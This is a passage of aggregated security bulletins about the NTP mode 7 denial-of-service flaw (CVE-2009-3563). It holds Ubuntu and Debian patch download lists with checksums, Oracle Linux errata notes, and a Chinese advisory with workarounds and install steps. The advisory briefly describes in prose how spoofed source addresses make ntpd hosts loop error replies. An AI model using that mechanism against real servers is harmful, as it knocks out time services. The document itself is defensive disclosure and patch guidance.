http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-3ubuntu2.3_i386.deb\r\n Size/MD5: 61224 fbf4533c390ea05b7149e370815983e1\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3_lpia.deb\r\n Size/MD5: 435450 1be0d440cf6bcf5048139c856b85106b\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-3ubuntu2.3_lpia.deb\r\n Size/MD5: 61184 a1b2a4c34beee7210e322b2f05d94095\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3_powerpc.deb\r\n Size/MD5: 490538 e6adb5a7bde67fc04b543664e6ef748f\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-3ubuntu2.3_powerpc.deb\r\n Size/MD5: 66780 35b709a20016e07b383362610ae2b45a\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3_sparc.deb\r\n Size/MD5: 442346 212fc209067ce419756fa2d6f486fd33\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-3ubuntu2.3_sparc.deb\r\n Size/MD5: 61964 7937872f5231323d82c98f0ace751a79\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4.diff.gz\r\n Size/MD5: 305723 ea6556c8f4053f2abd79e4cf96633a65\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4.dsc\r\n Size/MD5: 1555 fa669b54aac2751215e1fbac226bf51e\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz\r\n Size/MD5: 2835029 dc2b3ac9cc04b0f29df35467514c9884\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-doc_4.2.4p4+dfsg-6ubuntu2.4_all.deb\r\n Size/MD5: 928754 eaa802a30b795ce27417c0f8fd612564\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4_amd64.deb\r\n Size/MD5: 487270 83aef0ae73d841ca98c1aff95b68b974\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-6ubuntu2.4_amd64.deb\r\n Size/MD5: 66118 b1d338d727c1fbb479a0298e67cf920c\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4_i386.deb\r\n Size/MD5: 442316 9441f50fefcd831651417c8e66353769\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-6ubuntu2.4_i386.deb\r\n Size/MD5: 62320 67f26e8efd2233911b3ee5d5c779da52\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4_lpia.deb\r\n Size/MD5: 441714 cc6ffa5cf9f82b707ebf77291c0c7c2b\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-6ubuntu2.4_lpia.deb\r\n Size/MD5: 62086 d4c4d6efa2ae6c85b400d73bd39cac8d\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4_powerpc.deb\r\n Size/MD5: 491332 f4016ec402c0665df5241555af9a04ed\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-6ubuntu2.4_powerpc.deb\r\n Size/MD5: 67198 47c3dd10eae821a9d1abcf77a85d6651\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-6ubuntu2.4_sparc.deb\r\n Size/MD5: 449572 4a168bf44988c1da63a39bd14b17b682\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-6ubuntu2.4_sparc.deb\r\n Size/MD5: 62834 0ae1f43f7f327de4ab787c911f0fd1ca\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2.diff.gz\r\n Size/MD5: 306032 90b99d80d9e52e4db7e30b96002834b4\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2.dsc\r\n Size/MD5: 1556 b6f57df7732c6fd3a29de6d4c65c421d\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz\r\n Size/MD5: 2835029 dc2b3ac9cc04b0f29df35467514c9884\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-doc_4.2.4p4+dfsg-7ubuntu5.2_all.deb\r\n Size/MD5: 929066 4230567b7ef012596cd5e291df13df76\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2_amd64.deb\r\n Size/MD5: 487628 3789b894fe98014ed8b62fc910088d2a\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-7ubuntu5.2_amd64.deb\r\n Size/MD5: 66442 b43e6e46f0c035961fa2e382bd883fe2\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2_i386.deb\r\n Size/MD5: 442634 efaf8cc0f84114fe6d426827f22e3db4\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-7ubuntu5.2_i386.deb\r\n Size/MD5: 62642 7c9ce030867f9809b49634bdcc2a57a3\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2_lpia.deb\r\n Size/MD5: 442086 4dd3ea7d09c746a592b0b622f4fcb753\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-7ubuntu5.2_lpia.deb\r\n Size/MD5: 62410 77fa9c143489ea55da37adcd9f268e6b\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2_powerpc.deb\r\n Size/MD5: 491526 d04d12ed5ebc7968a90894d92ca094c6\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-7ubuntu5.2_powerpc.deb\r\n Size/MD5: 67530 55cffc037f6a88b24abd399925e700c3\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p4+dfsg-7ubuntu5.2_sparc.deb\r\n Size/MD5: 449666 7dbdc0aa05e90a9363dfcae003c3e531\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-7ubuntu5.2_sparc.deb\r\n Size/MD5: 63156 4647b041df35cabb86fb0789e3a083ce\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1.diff.gz\r\n Size/MD5: 344395 26dd6961151053346b36474a18d6412f\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1.dsc\r\n Size/MD5: 1575 c86cc4fe026ee6830d6564cabeaedc61\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p6+dfsg.orig.tar.gz\r\n Size/MD5: 2836728 bddc66cdc7c35c0cb22cc84cad770c65\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-doc_4.2.4p6+dfsg-1ubuntu5.1_all.deb\r\n Size/MD5: 931324 bcc11545b9399ca7e09268a85fd6eabf\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1_amd64.deb\r\n Size/MD5: 529994 c766915925a1cccbd27332232a45e016\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p6+dfsg-1ubuntu5.1_amd64.deb\r\n Size/MD5: 70098 968cdde0e47a775cf13b922c7f2308f5\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1_i386.deb\r\n Size/MD5: 490892 83e3785020b3cb659b6559cb51632333\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p6+dfsg-1ubuntu5.1_i386.deb\r\n Size/MD5: 66770 34bd54ff829c032049dc8d7340984b4c\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1_lpia.deb\r\n Size/MD5: 487552 f7ad919e64533aed59112c2fe5c49fd9\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p6+dfsg-1ubuntu5.1_lpia.deb\r\n Size/MD5: 66316 4a2cd9cdf5cfa46ad3784c37f7c29502\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1_powerpc.deb\r\n Size/MD5: 528880 401e4a455acdf2a14c5f556e8cae1911\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p6+dfsg-1ubuntu5.1_powerpc.deb\r\n Size/MD5: 69390 9e0e3535fbe3ffe61be245ddd22e5d6c\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntp_4.2.4p6+dfsg-1ubuntu5.1_sparc.deb\r\n Size/MD5: 499646 6059b8a5f9f216b8de00eed901af902e\r\n http://ports.ubuntu.com/pool/main/n/ntp/ntpdate_4.2.4p6+dfsg-1ubuntu5.1_sparc.deb\r\n Size/MD5: 67272 8d04c1e93ca4acd7a4eaac04008326b3\r\n\r\n", "edition": 1, "modified": "2009-12-09T00:00:00", "published": "2009-12-09T00:00:00", "id": "SECURITYVULNS:DOC:22897", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22897", "title": "[USN-867-1] Ntp vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "[4.2.2p1-9.el5_4.1]\n- fix DoS with mode 7 packets (#532639, CVE-2009-3563)\n- compile with -fno-strict-aliasing", "edition": 4, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "ELSA-2009-1648", "href": "http://linux.oracle.com/errata/ELSA-2009-1648.html", "title": "ntp security update", "type": "oraclelinux", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563", "CVE-2009-0159"], "description": "[4.1.2-6.el3]\n- fix DoS with mode 7 packets (#532641, CVE-2009-3563)\n- fix buffer overflow in ntpq (#532641, CVE-2009-0159)", "edition": 4, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "ELSA-2009-1651", "href": "http://linux.oracle.com/errata/ELSA-2009-1651.html", "title": "ntp security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:26:48", "description": "BUGTRAQ ID: 37255\r\nCVE ID: CVE-2009-3563\r\n\r\nNTP\uff08Network Time Protocol\uff09\u662f\u7528\u4e8e\u901a\u8fc7\u7f51\u7edc\u540c\u6b65\u8ba1\u7b97\u673a\u65f6\u949f\u7684\u534f\u8bae\u3002\r\n\r\nntpdc\u67e5\u8be2\u548c\u63a7\u5236\u5de5\u5177\u4f7f\u7528NTP\u6a21\u5f0f7\uff08MODE_PRIVATE\uff09\uff0cntpq\u4f7f\u7528NTP\u6a21\u5f0f6\uff08MODE_CONTROL\uff09\uff0c\u800c\u4f8b\u7a0bNTP\u65f6\u95f4\u4f20\u8f93\u4f7f\u7528\u6a21\u5f0f1\u52305\u3002\u5728\u4ece\u975erestrict ... noquery\u6216restrict ... ignore\u7f51\u6bb5\u6240\u5217\u51fa\u7684\u5730\u5740\u63a5\u6536\u5230\u9519\u8bef\u7684\u6a21\u5f0f7\u8bf7\u6c42\u6216\u6a21\u5f0f7\u9519\u8bef\u54cd\u5e94\u65f6\uff0cntpd\u4f1a\u56de\u590d\u6a21\u5f0f7\u51fa\u9519\u54cd\u5e94\u5e76\u8bb0\u5f55\u4e00\u6761\u6d88\u606f\u65e5\u5fd7\u3002\u5982\u679c\u653b\u51fb\u8005\u80fd\u591f\u5728\u53d1\u9001\u7ed9\u4e3b\u673a B\u7684\u6a21\u5f0f7\u54cd\u5e94\u62a5\u6587\u4e2d\u4f2a\u9020ntpd\u4e3b\u673aA\u7684\u6e90\u5730\u5740\uff0c\u5219\u53ea\u8981\u62a5\u6587\u8fd8\u53ef\u4ee5\u901a\u8fc7\u4e3b\u673aA\u548cB\u90fd\u4f1a\u8fde\u7eed\u7684\u5411\u5f7c\u6b64\u53d1\u9001\u51fa\u9519\u54cd\u5e94\uff1b\u5982\u679c\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u53d1\u9001\u7ed9ntpd\u4e3b\u673aA \u7684\u6a21\u5f0f7\u54cd\u5e94\u62a5\u6587\u4e2d\u4f2a\u9020ntpd\u4e3b\u673aA\u7684\u5730\u5740\uff0c\u4e3b\u673aA\u5c31\u4f1a\u65e0\u9650\u7684\u54cd\u5e94\u5176\u672c\u8eab\uff0c\u8017\u5c3dCPU\u8d44\u6e90\u5e76\u751f\u6210\u8fc7\u591a\u65e5\u5fd7\u3002\n\nUniversity of Delaware NTP 4.2.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4f7f\u7528ntp.conf\u914d\u7f6e\u6587\u4ef6\u7684restrict ... noquery\u6216restrict ... ignore\u9009\u9879\u9650\u5236\u6e90\u5730\u5740\u3002\r\n* \u8fc7\u6ee4\u6307\u5b9a\u4e86\u6e90\u548c\u76ee\u6807\u7aef\u53e3123\u7684NTP\u6a21\u5f0f7\u62a5\u6587\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1948-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1948-1\uff1aNew ntp packages fix denial of service\r\n\u94fe\u63a5\uff1ahttp://www.debian.org/security/2009/dsa-1948\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.dsc\r\nSize/MD5 checksum: 906 115e93f010e32aa1c90231461487503a\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg.orig.tar.gz\r\nSize/MD5 checksum: 2199764 ad746cda2d90dbb9ed06fe164273c5d0\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.diff.gz\r\nSize/MD5 checksum: 182632 80aa236bd0a39096c5e5d462c0b9b279\r\n\r\nArchitecture independent packages:\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp-refclock_4.2.2.p4+dfsg-2etch4_all.deb\r\nSize/MD5 checksum: 28596 df605f89c08a01116c2ff799777f6a2c\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp-simple_4.2.2.p4+dfsg-2etch4_all.deb\r\nSize/MD5 checksum: 28594 0c683ac7e7f5b131515f956aed87de3d\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.2.p4+dfsg-2etch4_all.deb\r\nSize/MD5 checksum: 912886 1af5a623cbf5f145f34dab7beefcd183\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_alpha.deb\r\nSize/MD5 checksum: 408070 ca33235c58a26ad1a839084b4f2d385c\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_alpha.deb\r\nSize/MD5 checksum: 65056 e527eb4c93d427c025374805fb5288cb\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_amd64.deb\r\nSize/MD5 checksum: 62258 13a4f4faaf699913e421c093e598f2a9\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_amd64.deb\r\nSize/MD5 checksum: 359384 1a289aa1f8439e2ef736cbf29bbe140f\r\n\r\narm architecture (ARM)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_arm.deb\r\nSize/MD5 checksum: 59784 8a84cae4e8f643cbd3ed684e5a7eb0ff\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_arm.deb\r\nSize/MD5 checksum: 344316 57066e8abfdf51c36d63600c993f3c20\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_hppa.deb\r\nSize/MD5 checksum: 372448 0b8f9b90bb03a2f572066fe8b47c7202\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_hppa.deb\r\nSize/MD5 checksum: 62160 88dc964fa357187ddc97d37513a863ba\r\n\r\ni386 architecture (Intel ia32)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_i386.deb\r\nSize/MD5 checksum: 58316 90fc92e7a8f6582ee21076849ae0dfba\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_i386.deb\r\nSize/MD5 checksum: 333772 e5fbae24686d444fff118f3ce9cc45db\r\n\r\nia64 architecture (Intel ia64)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_ia64.deb\r\nSize/MD5 checksum: 523358 0032e3c9bcb4a27a312a47fb95d1f9a1\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_ia64.deb\r\nSize/MD5 checksum: 74712 72c1b601f4beb41c6c04a54534ba9c51\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mips.deb\r\nSize/MD5 checksum: 382868 2980d63a9ca6344e6a76698d0e808f8c\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mips.deb\r\nSize/MD5 checksum: 63610 d523930b9b98d6353bf4e6fb7d7e57f5\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mipsel.deb\r\nSize/MD5 checksum: 64134 e4042de5af081701911a7cece69c6cce\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mipsel.deb\r\nSize/MD5 checksum: 390142 b50dc2bd5970f224b6994c460f8f560a\r\n\r\npowerpc architecture (PowerPC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_powerpc.deb\r\nSize/MD5 checksum: 358860 432b58ad621ac266455f7e5124d2eb1c\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_powerpc.deb\r\nSize/MD5 checksum: 61760 2c9dd1b3a8d61bece4f420e533b7a6eb\r\n\r\ns390 architecture (IBM S/390)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_s390.deb\r\nSize/MD5 checksum: 350300 40a28748d5016101c179bd4a22c08390\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_s390.deb\r\nSize/MD5 checksum: 61242 14c08344bfd0561ced0d54aa2cd23a2e\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_sparc.deb\r\nSize/MD5 checksum: 58584 0e573ef22b1514b12e01fa6ac2bb1ddb\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_sparc.deb\r\nSize/MD5 checksum: 332284 4589ff44bc97ad73513d8ba5419c7845\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.dsc\r\nSize/MD5 checksum: 1459 81e70fe84f27e3bfabdbfb9f3122492b\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz\r\nSize/MD5 checksum: 2835029 dc2b3ac9cc04b0f29df35467514c9884\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.diff.gz\r\nSize/MD5 checksum: 300928 b568f39eda3e46f27239ad44021f968c\r\n\r\nArchitecture independent packages:\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.4p4+dfsg-8lenny3_all.deb\r\nSize/MD5 checksum: 927658 8db03976b7b105057ead2da4bae09219\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_alpha.deb\r\nSize/MD5 checksum: 66706 9213dcba9a99fa363f0ce48c514a008b\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_alpha.deb\r\nSize/MD5 checksum: 538492 de37b288ef933f34446ab78a8d8ed76b\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_amd64.deb\r\nSize/MD5 checksum: 63836 a0b5b030abe6a6c32591366febcec1d1\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_amd64.deb\r\nSize/MD5 checksum: 479472 277efe45a76a24da6ca14ae581d0a3a2\r\n\r\narm architecture (ARM)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_arm.deb\r\nSize/MD5 checksum: 61220 d4905eea52795330e517acca903059f4\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_arm.deb\r\nSize/MD5 checksum: 448164 cc28e545eb359eba225abfcb02cc4377\r\n\r\narmel architecture (ARM EABI)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_armel.deb\r\nSize/MD5 checksum: 62794 e5a43b8076a77643cc742348f0e63de1\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_armel.deb\r\nSize/MD5 checksum: 458908 3721b8d7b7a67b31db6249521dd9f015\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_hppa.deb\r\nSize/MD5 checksum: 63872 53a7009f1888c06b162c258a9bb5d6fb\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_hppa.deb\r\nSize/MD5 checksum: 485744 b8e950ba02a13ecacfe332db56c0c887\r\n\r\ni386 architecture (Intel ia32)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_i386.deb\r\nSize/MD5 checksum: 434672 6ccfb060f39cc56f39ef8806865b767d\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_i386.deb\r\nSize/MD5 checksum: 60114 2f0914ae2191ddf3f74529bc896299da\r\n\r\nia64 architecture (Intel ia64)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_ia64.deb\r\nSize/MD5 checksum: 707812 eb960c732894d56589ba62d76c5ba568\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_ia64.deb\r\nSize/MD5 checksum: 76366 6b5b986e454276661e8b483f095bd16e\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mips.deb\r\nSize/MD5 checksum: 64116 ab287c70d2c2daf7b1a8808db8dcedc9\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mips.deb\r\nSize/MD5 checksum: 490394 0009cb5333123767dc3afcde682d9e10\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mipsel.deb\r\nSize/MD5 checksum: 500786 3b842b738e616f301c31cd025c595235\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mipsel.deb\r\nSize/MD5 checksum: 64776 fd31cdaa7a78d7e3fa072b746dd98e01\r\n\r\npowerpc architecture (PowerPC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_powerpc.deb\r\nSize/MD5 checksum: 490620 21d03b435c327c2884fe587a56fe10fb\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_powerpc.deb\r\nSize/MD5 checksum: 65470 6966f71002ae63c104e608af1a7daa3a\r\n\r\ns390 architecture (IBM S/390)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_s390.deb\r\nSize/MD5 checksum: 63678 4b143ad2444681bdb1ee44d395996a29\r\nhttp://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_s390.deb\r\nSize/MD5 checksum: 474000 6fb44a33381b0d582599eb33896d8f0f\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n 